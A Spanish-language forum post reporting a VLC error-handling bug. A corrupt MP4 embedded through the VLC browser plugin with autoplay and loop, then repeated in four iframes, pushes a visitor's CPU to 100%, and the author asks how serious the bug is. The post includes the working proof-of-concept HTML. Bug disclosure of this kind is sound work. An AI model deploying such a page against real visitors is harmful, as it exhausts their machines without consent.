Buenas, hace poco me di cuenta de que VLC no maneja bien los errores produciendo un bucle infinito que sobrecarga la CPU. Lo peor es que esto ocurre también cuando cargas un video de VLC por html sobrecargando la CPU de el que la visite hasta el 100%.
No se si esto es realmente un fallo de seguridad o no o si es grave o no y por eso busco la opinión de terceras personas.
Paso a explicar rápidamente la POC que hice para probar si a la gente también se le colapsaba la CPU al visitar la web.
Primero cree un archivo mp4 corrupto que edite con el siguiente contenido inválido
CitarAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓4♦AAAAAAAAAA☺↨↓
Luego cree un archivo html que cargaba dicho vieo
<embed type="application/x-vlc-plugin" pluginspage="http://www.videolan.org" version="VideoLAN.VLCPlugin.2" width="100%" height="100%" id="vlc" loop="yes" autoplay="yes" target="a.mp4"></embed>
Una vez echo esto cree otro html que colocaba unos 4 iframes del archivo anterior
<iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe> <iframe src="a.html"></iframe> Y el resultado fue el siguiente
(http://i41.tinypic.com/2a94851.png)
Resulta algo penoso que un programa como VLC falle en el manejo de errores.
Saludos, espero sus opiniones.
¿Qué tan grave es el bug?
(http://www.freeimagehost.info/files/img/user_uploads/displayimage.php?id=b0rbeo79sa83945925.gif)